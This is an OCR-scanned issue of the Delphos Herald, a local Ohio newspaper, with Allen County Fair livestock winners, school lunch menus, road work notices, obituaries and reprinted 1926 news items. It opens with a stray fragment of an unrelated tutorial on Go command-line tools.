$curl –s –L | pup div#about text{} Go is an open source programming language that makes it easy to build simple, reliable, and
Which will just give us the text in the div.
Since you can chain pipe commands together, you can do some pretty intricate analysis of links.
For example, you can take sites like Reddit and YCombinator (HackerNews), grab all the top links on the websites (
p.title for Reddit,
td.title For HackerNews), grab children tags with
a[href^=http], and then spit out the attribute itself to print all the top links using pipes.
You can also add
json to make it even more consumable and get things like this:
$ curl -s | \ pup td.title a[href^=http] json{} [ { "attrs": { "href": "https:.../" }, "tag": "a", "text": "SHOW HN: pup" }, ... ]
Building CLI tools with Go
import java.util.Scanner; class Hello { public static void main(String[] args) { Scanner reader = new Scanner(System.in); System.out.print("Enter your name: "); String name = reader.nextLine(); System.out.printf("Hello, "+name+"!"); } }
This is something like the first program I wrote in java in college. All it does is execute a program and it prints your name. Basically, the
system.in and
system.out is the same thing as
stdin and
stdout respectively.
Why Go?
Why not Java?
Java is a nice programming language, but you’d need java installed in your computer and not everyone has it installed, so it’s not optimal. Furthermore, Java can get pretty messy.
Why not Python?
Python is cool, and I’ve actually prototyped pup in Python initially, but again, Python needs an interpreter and people need to have Python installed along with the specific packages you’d need, such as Beautiful soup. Most of all it’s because of personal taste—I prefer Go.
Why not C?
There is actually an HTML parser in C called Gumbo, but C is pretty difficult for me, so it’s not the language I’d personally use. Go, on the other hand, is easier.
package main import "fmt" func main() { fmt.Println("Hello, world!") }
So this is what Go looks like as a simple hello world program. Packages are exactly what you think they are so don’t really worry about it. We’ll import the fmt, and print hello world.
To better illustrate how Go programs work, I wrote a little program called Line:
package main import "io" import "os" func main() { io.Copy(os.Stdout, os.Stdin) io.WriteString(os.Stdout, "\n") }
Line will take some input from
stdin, write
stdout, and then append a line to it. You import a couple packages such as
io and
os. The first thing you’d do is copy
stdin to
stdout, and then write a string with
stdout. And there, you’ve written a go program, or command line tool, that can do something interesting.
$ echo "Hello, World" Hello, World $ go get github.com/ericchiang/line $ echo "Hello, World" | line Hello, World
This is what echo hello world looks like, and you can use go to get the line program, in which it will compile the line program and allow you to run it in your own computer.
GoX
GoX is a cross-compiler. For any of you who’s writing command line tools with go, I’d strongly recommend checking out GoX.
This is the release tool for pup—you can see it on github—and don’t worry about the bottom part, since it’s just messing with zip files. The important thing is this part:
gox -output "dist/{{.Dir}}_{{.OS}}_{{.Arch}}"
Where it will build parallels like this:
The cool thing is that Go has no dependencies like Python and is completely runnable on other systems like windows.
Books to recommend on Command line tools:
Shell Scripting will get you the general gist of using command line tools in a linux and unix environment.
Data Science at the Command Line is also an excellent book that will teach you how to analyze data using the command line tool
Codementor Eric Chiang is a software engineer and founding member at Yhat, a NYC startup building products for enterprise data science teams. Eric enjoys of Go, data analysis, Javascript, network programming, Docker, and grilled cheese sandwiches.
Need Eric’s help? Book a 1-on-1 session!
or join us as an expert mentor!
Or Become a Codementor!
Codementor is your live 1:1 expert mentor helping you in real time. | https://www.codementor.io/go/tutorial/pup-golang-cli-tools-eric-chiang | CC-MAIN-2017-34 | refinedweb | 1,845 | 69.82 |
Building Your Own Perl Modules
The Perl Journal January 2003
By Arthur Ramos Jr.
Arthur is a Systems Administrator and Adjunct Instructor at Orange County Community College in Middletown, New York. He is the owner of Winning Web Design () and can be contacted at aramos@sunyorange.edu.
The English language has been a vibrant, robust language for over a millennia. It has grown and expanded with the march of progress from the dark ages to the information age. It adapts itself well to our exponential increase in knowledge and to influences from other languages and cultures. This robustness is mirrored in the Perl programming language.
Perl was written to be extensible, to allow new functions and features to be added in without having to submit a request and wait for the next version. The Comprehensive Perl Archive Network (CPAN,) is the repository for all the modules that have been written by programmers from around the world. These modules have enhanced Perl with powerful features allowing CGI programming, Database access, LDAP management, X windows programming, and much, much more. These modules can be downloaded and installed, enhancing the local version of Perl. This is analogous to a dialect of the English language.
Not only can modules be downloaded and installed from CPAN, but programmers can write modules for use on the local machine. Rather than cutting and pasting useful subroutines from one script to another, and dealing with the maintenance morass that creates, why not create a local Perl module containing the nifty subroutine? This module can then be included in each script that needs the subroutine. The scripts can use the subroutine as though it was hardcoded into the script file. When changes are made to this subroutine, the new version will automatically be picked up by the scripts.
I had just such a subroutine, one that I had duplicated in many different languages over the years. This subroutine started out as a Fortran subroutine! The subroutine's name is oneof. It is passed a search value and a list of valid values separated by a specified character. It returns a 0 if the value is not found in the list, or an index 1..n specifying which value the search value matched. This allows me to do quick testing of values without having to define extraneous variables in my script. The following fragment shows how the oneof subroutine is used, in this case without testing the return variable:
$mine = "of"; if (oneof($mine,"this,is,only,a,test,of,oneof")) { print "Found it in the string\n"; } else { print "NOT FOUND\n"; }
This fragment shows the use of oneof, this time testing the return variable:
$mine = "of"; if ($item = oneof($mine,"this,is,only,a,test,of,one of")) { print "Found it in the string at location $item\n"; } else { print "NOT FOUND\n"; }
If the list of valid values is separated by a character other than a comma, a third value can be passed containing the separator character:
$mine = "of"; if ($item = oneof($mine,"this;is;only;a;test;of;one of",";")) { print "Found it in the string at location $item\n"; } else { print "NOT FOUND\n"; }
The full subroutine with comments is shown in Example 1.
More experienced Perl programmers would probably write the same subroutine without the comments and with as few extra variables as possible. This is where obfuscated Perl code beginstrying to do a task with as few characters as possible. Presented here is a slightly obfuscated version of the oneof subroutine to make later examples more succinct:
sub oneof { if ($_[2]=~/^$/ || $_[2]!~/.{1}/) {$_[2]=",";} @l = split(/$_[2]/,$_[1]); for ($x=0,$f=0;$x<$#l;$x++) { if ($_[0] eq $l[$x]) { $f=$x+1; last; } } return $f; }
In order to modularize this subroutine, create a Perl module file. In vi (or whatever editor you prefer) open a file called ONEOF.pm. I capitalize the module name so that it will stand out in my Perl scripts. In this file, there is no bang command to specify that perl is to be run (no #!/usr/bin/perl). The first line defines the module's namespace. A namespace is a separate area set aside for the package so that variables and subroutines within will not clobber items with the same name in the main script. In this example, we will use a namespace called ONEOF, which I also capitalize to set it apart from the subroutine name oneof:
package ONEOF;
We then have to tell the package that the subroutine name oneof can be exported to the main script's namespace. Another package, called "Exporter," is required to perform this task. Include the Exporter package in the new module (from here on, bold code signifies the newly added material):
Package ONEOF; Use Exporter; @ISA = ('Exporter');
Or, alternatively, you could write that last line as:
@ISA = qw(Exporter);
The programmer must specify to the Exporter module that the subroutine oneof can indeed be Exported to other namespaces:
Package ONEOF; Use Exporter;@ ISA = qw(Exporter); @EXPORT = ('oneof');
Again, you could use @EXPORT = qw(oneof); for that last line. Next include the text of your subroutine, and then terminate the module with a 1;. This terminator is required.
Package ONEOF; Use Exporter;@ ISA = qw(Exporter)@ EXPORT = qw(oneof); sub oneof { if ($_[2]=~/^$/ || $_[2]!~/.{1}/) {$_[2]=",";} @lst = split(/$_[2]/,$_[1]); for ($x=0,$f=0;$x<$#lst;$x++) { if ($_[0] eq $lst[$x]) { $f=$x+1; last; } } return $f; } 1;
This is now a complete Perl module. Make sure that ONEOF.pm is either in the same directory as the script that will be run, or in a directory specified in the PATH environment variable. In the script that contains the test fragment shown at the beginning of this article, specify to Perl that you want to use the ONEOF.pm module:
use ONEOF;
$mine = "of"; if ($item = oneof($mine,"this,is,only,a,test,of,one of")) { print "Found it in the string at location $item\n"; } else { print "NOT FOUND\n"; }
If we had not exported the oneof subroutine from the module, we would have to explicitly reference the namespace and subroutine name:
ONEOF::oneof
The if statement in our test fragment would be changed to:
if ($item = ONEOF::oneof ($mine,"this,is,only,a,test,of,oneof")) {
This facility was written in this way to give the programmer control over what can be accessed between namespaces. To eliminate having to specify the namespace when not doing the exporting in the module itself, modify the use statement to explicitly export a specific subroutine within the module:
use ONEOF ('oneof');
or
use ONEOF qw(oneof);
Multiple subroutines can be placed in a single Perl module. Try to collect subroutines that perform similar functions in individual modules (for example, "MYPRINTERS.pm"). If you are programming in an organization, a good suggestion would be to use the organization's initials at the beginning of the module name to show other programmers that this module is local. For example, I am employed by Orange County Community College in Middletown, NY, so I would use a module name such as OCCCPRINTERS.pm. When you have several subroutines in a module that need to be exported, separate the subroutines with a space in the @EXPORT statement:
@EXPORT = ('subone' 'subtwo' 'subthree');
Likewise, if you are explicitly referencing multiple subroutines in your script, use this same convention:
Use OCCCPRINTERS ('subone' 'subtwo' 'subthree');
And that's it. This will help you begin to modularize your Perl code. We'll get into more advanced modularization topics and namespace usage in future articles.
TPJ | http://www.drdobbs.com/web-development/building-your-own-perl-modules/184415975 | CC-MAIN-2015-35 | refinedweb | 1,278 | 57.1 |
VUser::Log - Logging support for vuser
use VUser::Log qw(:levels); my $log = new VUser::Log($cfg, $ident); my $msg = "Hello World"; $log->log($msg); # Log $msg at level LOG_NOTICE $log->log(LOG_DEBUG, $msg); # Log $msg at level LOG_DEBUG $log->log(LOG_DEBUG, 'Crap! %s', $msg); # Logs 'Crap! Hello World'
Generic logging module for vuser.
$log = VUser::Log->new($cfg, $ident); $log = VUser::Log->new($cfg, $ident, $section);
A reference to a tied Config::IniFiles hash.
The identifier for this log object. This will be used to tag each log line as being from this object. This is similar to how syslog behaves.
This tells VUser::Log which section of the configuration (represented by $cfg) to look for settings in. If not specified, vuser will be used.
When you decided that it's time to log some info you call the VUser::Log object's log() method. log() can be called in one of three ways.
$log->log($level, $pattern, @args);
$level is the log level to use. You can import the LOG_* constants into your namespace with
use VUser::Log qw(:levels);.
$pattern is a formatting pattern as used by printf().
@args are the value for any placeholders in $pattern.
$log->log($level, $message);
You can omit the pattern and simply pass a text string to log.
$log->log($message);
You can even omit the log level and the message will be logged with a level of LOG_NOTICE.
The levels are, in increasing order of importance: DEBUG, INFO, NOTICE, WARN, ERROR, CRIT, ALERT, EMERG. ERR is provided as a synonym for ERROR.
You can import the LOG_* constants for use where ever log levels are needed by using
use VUser::Log qw(:levels).
Extensions do not need to create a new VUser::Log object. You can simply use $main::log or do something like this:
my $log; sub init { ... $log = $main::log; ... }
After that, you can use $log anywhere in your extension.
[vuser] # The log system to use. log type = Syslog log level = notice
Note: Each log module will have it's own configuration.
VUser::Log uses subclasses to do the actual logging.
Subclasses of VUser::Log must override, at least, these methods.
Any module specific initialization should be done here. init() takes only one argument, a reference to the config hash created by Config::IniFiles.
This method will do the actual writting of the log messages. It takes two parameters, the log level and the message. | http://search.cpan.org/~rsmith/vuser-0.5.0/lib/VUser/Log.pm | CC-MAIN-2017-30 | refinedweb | 407 | 76.32 |
This action might not be possible to undo. Are you sure you want to continue?
08/25/2012
text
original
The
50¢ daily
From the Thrift Shop, p5
Wildcats win season opener, p6
Saturday, August 25, 2012
Telling The Tri-County’s Story Since 1869
HERALD
Delphos, Ohio
Commission needs help moving boat
Upfront
Allen County Fair
Delphos Canal Commission Trustees need assistance at 5:30 p.m. Wednesday to move the remains of the Marguerite from a storage trailer into the museum for display. Those who assisted in removing the boat from the museum in 1987 have a special invitation to attend. Those interested are to meet on Main Street in front of the Canal Commission Museum.
‘Free Food on Us’ set Tuesday
The Delphos Community Unity “Free Food on Us” will be held from 3-5 p.m. on Tuesday at the Delphos Eagles Lodge. The doors open at 2 p.m. Food will be distributed on a first-come, first-served basis to income-eligible resident of the Delphos City School District. Identification and a self-declaration of income are needed.
Elwer shows champion hog
Troy Elwer BY STACY TAFF staff@delphosherald.com
Joseph takes Grand and Reserve Grand Champion with goats
BY STACY TAFF staff@delphosherald.com DELPHOS — For the third consecutive year, Megan Joseph took home one of the top prizes in the Born and Raised Goat competition of the Allen County Fair. This year, she was named Reserve Grand Champion after taking Grand Champion the last two years. Joseph isn’t too disappointed — this is also the first year she won Grand Champion in the Market Goat competition. “Last year I was close to
Megan Joseph
LIMA — Troy Elwer of Delphos took Grand Champion during the Jr. Fair Market Hog Show Wednesday at the Allen County Fair, a win he attributes to sticking with methods that work. “I don’t think I really did anything better or different this year; I did the same things I did when I won back in 2009,” Elwer said. TODAY “I treat all my pigs the same; it’s Football: Lima just that this pig did better.” Central Catholic at St. Elwer, who will be a seventhJohn’s, 7:30 p.m. grader at St. John’s this year, says Boys Soccer: Ottoville raising hogs keeps him busy. at Bryan, 1 p.m.; Van “We spend probably 35-40 Buren at Kalida, 1 p.m.; Spencerville/Elida and Fort hours a week, just feeding, rinsJennings/Bluffton at Elida ing and working with them. That’s probably my favorite part Soccer Classic, 5/7 p.m. Girls Soccer: Fort Jennings at St. John’s (JV 1st), 11 a.m.; Ottoville at Bryan, 11 a.m.; LCC at Jefferson (NWC), noon Boys Golf: Ottoville, Lincolnview, Spencerville and Kalida at the Allen East Tournament (Springbrook), 8:30 a.m. Volleyball: Columbus Grove tri-match, 10 a.m.; Elida at Leipsic, 12:30 p.m. Co-ed Cross Country: Ottoville, Lincolnview, Spencerville, Kalida, Columbus Grove and Crestview at St. John’s Invitational (Stadium Park), 9 a.m.
Sports
of showing; just spending time with the pigs,” he said. “I showed two at the Ohio State Fair this year and two at the county fair. I didn’t show any other animals this year; just pigs. I’m not sure about next year, right now we’re just thinking about what we want to do.” Before he heads to the fair again, Elwer hopes to make some improvements to his techniques. “I would like to improve in showmanship; I’d like to win in my age group,” he said. “Right now, I’m at beginner level showmanship, so next year will be my first year at junior level. Elwer, who will turn 13 in September, keeps busy throughout the year with football, basketball and baseball. He is the son of Scott and Chrissy Elwer.
Reserve but this is the first year I’ve won,” she said. “I like to think my experience plays a role. I worked with my goats a lot more and kind of put together everything I’ve learned over the years. See JOSEPH, page 2
Redmond oldest person at fair Thursday
BY MIKE FORD mford@delphosherald.com DELPHOS — On any given day, Allen County Fair organizers bestow the notoriety of being the oldest person at the fair on the person deserving of the title. Wednesday, the honor went to Charlene Redmond of Delphos, who turned 100 earlier this year. With her full mental faculties and quick wit in tact, Redmond lives in the assisted living side of Vancrest Healthcare Center. For eight years, Activities Director Barb Brotherwood has taken her to the fair, figuring she would win. With three digits, she would not be denied this time. When asked how she felt about winning, she indicated it was better than one of the alternatives. “I guess it’s an honor,” she said. “I don’t feel any different than I ever did but I didn’t want to die, so I guess
Charlene Redmond I wanted to win.” “Then Lima went and took Born and raised in Lima, it away from us. That made Redmond moved to Delphos some of us mad; I didn’t with her husband to raise their even go to the fair for a while three daughters in the 1930s. because they took it from At the time, the fair was still us but I forgave them,” she held in local streets. said.
Index
Clear tonight and in mid 60s; then sunny Sunday with high in upper 80s. Obituaries State/Local Politics Community Sports Church Classifieds TV World news
Forecast
Reindel double champ at fair
BY STACY TAFF staff@delphosherald.com 2 3 4 5 6 7 8 9 11 LIMA — This year’s Allen County Jr. Fair has been a good one for 19-year-old Austin Reindel, son of Mike and Karen Reindel of Delphos. In addition to snagging Reserve Grand Champion in the Market Hog Show, Reindel also won Champion of Champions Showmanship and second overall in showmanship with his steer. “I worked more on showmanship this year, getting the hog to walk with its head up and
Austin Reindel
just working on presentation,” he said. “It felt like that really helped me out with everything. I still need to do a lot of work on keeping his movements smoother. I’ve never won showmanship with hogs before now but I’ve won with steers and I think that gives me a bit of an edge.” The amount of hours it takes to care for the livestock Reindel shows is equivalent to the average full-time job. He says it would be a lot harder without the help of his family. See REINDEL, page 2
Dan Heath/Paradise Band closes concert series
File photo
The Dan Heath and the Paradise Band will close out the Delphos Rotary Club’s Music in Park Series at 6 p.m. on Sunday. Dan Heath has assembled the finest musicians from Northern Indiana to present Sinatra, Tony Bennett, Nat King Cole, Bobby Darrin, the Beatles, Elvis, Michael Buble and 50s-60s rock’n’roll. Food service begins at 5:30 p.m.
HIGH SCHOOL SCOREBOARD
We buy, sell, and trade just DELPHOS JUST LIKE We AN OLD about anything that is in SELL,BUY, TRADING FASHIONED and TRADE TRADING good shape and has a goods of all POST POST types. market value.
We also buy and sell new and used fire arms, gold and silver, antiques and collectibles; so come see us at the Delphos Trading Post and let us help your dollars go further.
STOCK CHANGES DAY TO DAY! IF YOU WANT IT AND WE DON’T HAVE IT, WE’LL TRY TO FIND IT FOR YOU.
Jefferson 38 Waynesfield 17 Bryan Van Wert 56 0
Elida Piqua
30 7
Mar. Local Shawnee Bath Allen East Celina Versailles
42 28 63 42 46 26
Col. Grove 40 Pan. Gilboa 6 Crestview Parkway 40 16
Hours: Tues.-Thurs. Wed. & Thurs. 8:30-7:00 Friday 8:30-5:00 8:30-5, Fri. 8:30-6, Saturday 8:30-4:00 Closed Sat. Mon., & Tues. Sun., 9-2
528 N.Washington St. Delphos
419-692-0044
Right on the corner of 5th St. and N. Washington St. next to Bellman’s Party Shop.
Spencerville 63 Perry 7
2 – The Herald
Saturday, August 25, 2012
My summer
The nights are cooler and Firemen’s Convention to Relay to three county fairs, Fourth of July and Fort Jennings turning 200 thrown in the middle, there’s plenty to do. Once again, we were honored with hosting Murray’s granddaughter, Claire. A delightful 16-year-old, she brought a breath of fresh air to the newsroom when she graced us with her presence. She spent some time in each department and she even went out on assignment by herself. Her visit was too early for the fair this year. I was a little bummed. I like the fair so much and can’t get there and she doesn’t have her fair shoes yet. Last year was Claire’s first ever trip to a county fair. I know it’s hard to imagine when they are a part of your life that some people have never experienced one. Nonetheless, she can check off her annual visit to Delphos. One thing I can mark off my list is surviving what I have dubbed “The 2012 Blackout.” I won’t soon forget those 4 1/2 days that were hot as h-e-double hockey sticks. I know, I know, some were without power for a lot lon-
For The Record vacation ... Joseph
NANCY SPENCER
(Continued from page 1)
On the Other hand
ger than I was but it doesn’t mean I can’t be snarky at the thought of doing it again. It was pretty crappy. I also got to spend some quality time with Cameron and friends. He’s doing well and started his fall classes this week. He’s very busy and has to remind me that I can also call him. I am super excited about Labor Day weekend — the last weekend of summer. Just happens to be my birthday weekend. What? You say. Please, not gifts. I have everything I need. Really. I have a pretty good date for a birthday. It’s kind of a last hurrah of summer and then a segue way into my favorite season — fall. I can almost hear the crunch of the leaves and smell the first frost. Editor’s note: So now I want to know what you guys did this summer. Send pictures of your summer activities to nspencer@delphosherald.com or drop them off at the office. Make sure you identify the people in the photos, what they are doing and where they are doing it. We’ll put them in the paper and you’ll have another souvenir or memory of your summer.
I had a good goat to start with and all of that plays a role too.” This year, Joseph has two market goats, three breeding projects and four kids at the fair. She tries to spend time working with them every day. “I work with my goats about 10 hours a week — probably about an hour and a half a day — with feeding them and walking them. Exercise is a big thing. I worked on the feed a lot this year, concentrating on how much protein they get. Another thing I did different this year is I worked with the breeding stock a lot better.” Last year was the first year the St. John’s High School junior tried out for fair royalty. She was named Jr. Fair Goat Queen. “I wanted to try out for Jr. Fair Queen this year but I wasn’t old enough, so I’ll try next year,” she said.
Reindel
The daughter of Norm and Kim Elwer usually shows dogs at the fair as well. “I recently had to give that up,” she said. “It was just too much with all of the other activities I have going on.” In addition to her fair activities, Joseph keeps busy with track and cross country training. Joseph loves working with her goats, but the things she loves most about showing them at the fair are the lessons and knowledge that come with the experience. “My favorite thing is just coming out and showing; doing my best whether I win or lose,” she said. “I love getting into that competition and hearing what the judge says and taking that into the next year.” “I really owe a thank-you to my parents and my advisor,” Joseph added. “They’ve helped me so much and if they hadn’t been there for me I wouldn’t have accomplished any of this.” opportunities he’s enjoyed and the help given by his father. “I really feel I need to thank my dad, not just for all of the work he does but for everything he’s sacrificed to make showing possible for us kids. He does a lot,” he said.
The Delphos Herald
Nancy Spencer, editor Ray Geary, general manager Delphos Herald, Inc. Don Hemple, advertising manager Tiffany Brantley, circulation manager
Vol. 143 No.53
(Continued from page 1)
ODOT REPORT
Phase 1 of a 3-phase project which will reconstruct Interstate 75 from the Auglaize County line to just north of Ohio 81, including the city of Lima. Work on the,
PUBLIC INVITED
speaking at Delphos K of C Hall, Elida Ave. 7:00 p.m. Tuesday, August 28th Speaking on Separation of Church and State
Christopher Long, Ohio Christian Alliance President,
Free educational opportunity. For info and yard sign, go to site
drainage work and paving on the ramps. Following the Labor Day holiday,, Bryn Mawr Road from Reservoir Road to Elm Street also closed May 1 until late fall. Traffic on Interstate 75 in the area of the bridge is maintained, two lanes in each direction, with occasional nighttime lanes closures necessary at times. Interstate 75 southbound from Ohio 81 to Fourth Street reduced to one lane through the work zone on Monday and Tuesday for pavement repair. The restriction will be in place until 11 a.m. Interstate 75 southbound from Ohio 81 to Ohio 65 reduced to one lane through the work zone on Thursday for pavement repair. The restriction will be in place until 11 a.m. U.S. 30 from Ohio 65 to Ohio 696 is restricted to one lane through the work zone for a pavement repair and resurfacing project which will continue through November. Putnam County U.S. 224 between the Van Wert Line and Ohio 66 will be restricted to one lane through the work zone for pavement repair. Ohio 634 between U.S. 224 and Ohio 613 will be restricted to one lane through the work zone for pavement repair. Ohio 114 between Ohio 694 and U.S. 224. Ohio 65 at the north edge of Leipsic closed Aug. 20 for three days for a railroad crossing repair. Traffic detoured onto Ohio 613, Ohio 108 and Ohio 18 back to Ohio 65. Van Wert County U.S. 30 east of Van Wert will be restricted to one lane through the work zone for pavement and joint repair. Ohio 66 between Delphos and Ottoville restricted to one lane through the work zone for removal of pavement reflectors.
“We raise our own pigs and there’s just so much work that goes into it,” he said. “Dad is out there at 6 a.m. and 10 at night every day and we’re always out there rinsing, making sure the pens are clean. We all work on the pigs together, so it’s really a CLEVELAND (AP) — Pick 4 Midday family project. That’s the best These Ohio lotteries were 1-2-4-4 part, the family part of it. We drawn Friday: Pick 5 Evening enjoy getting that quality time Mega Millions 6-0-2-6-8 together.” 25-34-45-46-49, Mega Pick 5 Midday With this most likely Ball: 34 4-2-2-7-0 being Reindel’s last year, he Megaplier Powerball expressed gratitude for the 2 Estimated jackpot: $50 Pick 3 Evening million 3-2-5 Rolling Cash 5 Pick 3 Midday 09-13-26-28-34 RODE, Virginia C., 84, of 4-8-9 Estimated jackpot: Delphos, Mass of Christian Burial Pick 4 Evening $110,000 begins at 11 a.m. today at St. John 6-7-2-9 the Evangelist Catholic Church, the Rev. Chris Bonsack officiating. Burial will follow in Resurrection Cemetery. Memorials are to St. Rita’s Hospice. WERNER, Jack E., 86, of Florida and formerly of Delphos, services will begin at 11 a.m. Answers to Friday’s questions: Monday at Harter and Schier Don Rickles played CPO Otto Sharkey on TV? Funeral Home, the Rev. Angela Abbott and Costello’s first starring movie was Buck Khabeb officiating. Burial will Privates. be in Walnut Grove Cemetery Today’s questions: with military rites by the Delphos Veterans Council. Friends may What was the name of Crusader Rabbit’s sidekick? call from 2-4 p.m. Sunday and What magazine always features an obituary on the one hour prior to the services last page? Monday at the funeral home. Answers in Monday’s Herald. Memorial contributions may be Today’s words: made to the American Cancer Dactylion: a finger exercise for pianists Society or Tuscany/Hospice House of Marion County.
LOTTERY
FUNERAL
Get the relief you are searching for at 419-238-2601 or visit
Neck Bones
The Dancer by Gina announces NEW Adult Zumba Classes
Delphos St. John’s Week of Week of Aug. 28-31 Tuesday: Hamburger Sandwich/ pickle & onion, assorted fries, Romaine salad, peaches, fresh fruit, milk Wednesday: Sloppy Jo Sandwich, peas, Romaine Salad, Mandarin Oranges, fresh fruit, milk Thursday: Italian grilled chicken sandwich, broccoli/ cheese, Romaine salad, mixed fruit, fresh fruit, milk Friday: Stuffed crust pepp. pizza, green beans, Romaine salad, applesauce, fresh fruit, milk Delphos City Schools Week of Week of Aug. 28-31 Tuesday: Hamburger Sandwich, cheese slice, french fries, orange juice bar, low fat milk Wednesday: Pepperoni pizza, Romaine salad, strawberries, low fat milk Thursday: Chicken patty sandwich, green beans, chilled peaches, low fat milk Friday: Franklin: Hot dog sandwich, Middle & Senior: Footlong hot dog, corn chips, baked beans, diced pears, low fat milk
Spencerville Schools Week of Aug. 28-31 Tuesday: Breaded chicken patty sandwich, broccoli w/cheese, pineapple, milk Wednesday: Hamburger Sandwich, baked beans, peaches, milk Thursday: Breakfast pizza, smiley fries, apple slices, milk Friday: Cavatini, salad w/ carrots, garlic breadstick, applesauce, milk Lincolnview Week of Week of Aug. 27-28 Monday: Chicken Patty/Bun, California Blend, mixed fruit, milk Tuesday: Pepperoni pizza, garden peas, pineapple, milk Wednesday: Hot dogs/bun, baked beans, applesauce, milk Thurs. and Fri.: No School Fair Day Ottoville Week of Week of Aug. 27-31 Monday: Chicken patty w/ lettuce, carrot stix, peaches, brownie, milk Tuesday: Taco salad 4-12, Tacos’ K-3 w/cheese-lettucetomato, cookie, mixed fruit, milk Wednesday: Grilled cheese, broccoli, chips, pineapple, milk Thursday: Spaghetti, breadstix, peas, applesauce, milk Friday: Corn dog, corn chips, green beans, peaches, milk Fort Jennings Local Schools Week of Aug. 28-31
Monday: Taco, refried beans, mixed vegetables, fruit Tuesday: Fiestata, pease, dessert round, fruit Wednesday: Spaghetti & Meatsauce, breadstick, green beans, fruit Thursday: Corn dog, carrots, cheese stick, fruit Friday: Spicy Chix sandwich, cheese slice, broccoli, fruit Landeck Elementary Week of Aug. 28-31 Tuesday: Hamburger Sandwich, green beans, fruit, milk Wednesday: Spaghetti with meat sauce, bread stick, cheese slice, fruit, milk Thursday: Turkey sandwich, mashed potatoes & gravy, fruit, milk Friday: Toasted Cheese Sandwich, corn, fruit, milk Elida Week of Aug. 28-31 Tuesday: Chicken nuggets w/ dip, green beans, applesauce, fresh fruit, dinner roll, milk Wednesday: R.S. cheese pizza, steamed broccoli, diced peaches, fresh fruit, milk Thursday: Salisbury steak, mashed potato & gravy, grapes, fresh fruit, whole grain bread stick, milk Friday: Hamburger w/pickle, baked bean, Mandarin oranges, fresh fruit, rice krispy treat, milk.
AT OUR NEW LOCATION:
203 N. MAIN ST. • DELPHOS ★ GRAND PRIZE: 15.6” LAPTOP COMPUTER ★
• NEW COMPUTER TOWERS $299 & UP • NEW LAPTOPS $399 & UP
Computer repair since 1993
Good Selection
Make a qualified purchase from 8-6-12 to 9-6-12 and you will be entered for a drawing for prizes at our Grand Opening on Sept. 7th & 8th. See our website for details.
WHY PAY MORE?
• LG FLAT Marilyn‐ PANEL TVs
• BLU-RAY PLAYERS for home & small business. • SOUND BARS Please use the above ad with description of Zumba with the following information. • HOME THEATER SURROUND SOUND • USED COMPUTERS • SCREEN SIZES from 22” to 65” • COMPUTER The Dancer By Gina announces NEW Adult Zumba classes! ACCESSORIES CHECK OUR PRICES
a
friend
and
call
today!
419‐692‐6809
Thedancerbygina.com
Classes
start
Sept
10
on
Mondays
or
Thursdays
6:30‐7:15pm!
Join
the
10
week
session
or
walk‐in
!
203 N. Main St. (old Westrich location) • Delphos • 419-692-5831 email dangerd@wcoil.com
GERDEMAN’S TV & COMPUTER
for SPECIALS OF THE WEEK! “Buy th service after the sale since 1952” with
AT McDonald’s
RED BOX
FALL LEAGUE OPENINGS
AUGUST BOWLING SPECIAL
Full line of sandwiches, side dishes, your favorite beverages
NEW BRUNSWICK PRO LANE SURFACE
Sunday Mixed League Call or stop in for all details
Stop in for lunch or snack...
only $2 per game!
OPEN AT NOON MONDAY THRU SATURDAY
Delphos Recreation Center
939 E. Fifth St., Delphos 419-692-2695
Saturday, August 25, 2012
The Herald –3
---------Palestine to get electrification French and British engineers have completed a project which it is hoped will be put in place very soon for the electrification of Palestine by causing the waters of the Eastern Mediterranean to flow over a 250-foot ridge bordering the coast thence through a canal cut out of solid rock, whence the waters would hurl down in an almost sheer drop into Lake Tiberius and the Dead Sea, more than a one thousand feet drop. It is estimated that the total electric energy developed would be sufficient for Palestine, Syria, Asiatic Turkey and Egypt. The total cost is placed at about $75,000,000. Able scientists have calculated the net energy at 420,000 H.P. Delphos Herald, Sept. 8, 1926 ---------Delphos fans plan to see Babe Ruth play A number of Delphos baseball fans are planning to go to Lima Friday to see the great “Bambino” play ball. Lima and Celina are to play the deciding series which was evened out Sunday when Celina won by a score of 1 to 0. In addition to Ruth, the Lima club will have such stars as Billy Southworth, St. Louis outfielder; Frank Gilhooley and Micky Heath of the Toronto minor league champions, and Pinke Pitting, late of the Louisville club and now the property of the Cincinnati Reds in its lineup. With Celina will be Bruno Betzel, Louisville infielder; Tavener of the Detroit Tigers and Ty Freigau of the Cubs, besides other league luminaries. Delphos Herald, Oct. 13, 1926 ---------Two women shoplifters The local police have identified two women, who, it is alleged, were guilty of shoplifting in Delphos a few days back. The two visited several local stores among them the Lange Dry Goods store, the Remlinger Drug Store and the Neuer 5 and 10 cent store. In the last named place, it is claimed, one of the women was seen by Miss Theresa Neuer taking some merchandise and putting it into a large bag which she was carrying. Miss Neuer accused her of stealing and took hold of the bag. The woman ran and the handle of the bag, tearing loose, it was left behind. In the bag were found silk remnants and a table scarf, stolen from the A.H. Lange store; a vanity case and powder puff from the Remlinger store and stockings and two silver table mats from the Neuer store. The women, the police state, have agreed to come in and make settlement. Their names are not being announced and it is likely that no arrests will be made. Miss Neuer secured the license number of a car in which the two women left the city. Delphos Herald, Oct. 13, 1926 ---------Hog cholera raging near Delphos Hog cholera is still playing havoc with hogs in this vicinity. The disease continues to be doing most damage southeast of the city. One man in that territory lost forty hogs and others are reporting heavy losses. Many of the farmers are having their hogs inoculated to prevent them from taking the disease. Delphos Herald, Oct. 13, 1926 ---------Finds story of Columbus’ Last trip to America New Orleans, La. – A full account of Christopher Columbus’ last voyage, a roster of his crews, their salaries and all incidents of their trip, were said by Dr. Rudolph Schuler, archeologist, to be contained in manuscripts brought here by him from Central America. Dr. Schuler, who for the last 27 years had conducted archeological and linguistic research in Central America, same here with the view of having Tulane university publish the results of his years of labor. The scientist said he unearthed unpublished accounts of Columbus’ last voyage to America, together with a history of the survivors of the expedition, while delving into ancient Central America and Spanish archives. Delphos Herald, Sept. 22, 1926 ---------Two cooks in wreck near Delphos Two men believed to be of the genus “yegg” are in the Van Wert County Hospital at the present time and awaiting transfer to jail as the result of an accident, shortly before midnight on the Lincoln Highway at the bridge over the second creek west of Delphos. An auto said to have been stolen, was wrecked. The men gave their names as Casey Mitchell and Leo Armstrong, both of Ft. Wayne. The car, a Nash roadster, struck the concrete wall of the bridge and was reduced to a mass of wreckage. Mitchell was driving at the time and was caught under the steering wheel and was badly injured. His companion was asleep and also was injured. Passersby picked the men up and brought them to Delphos to a local physician. Two guns, a 45 automatic and a 32 automatic, were carried by the men and fuses, dynamite detonators and ear drum protectors used for protection during explosion, were found in the car. These awakened suspicion and the police were called. They, in town, 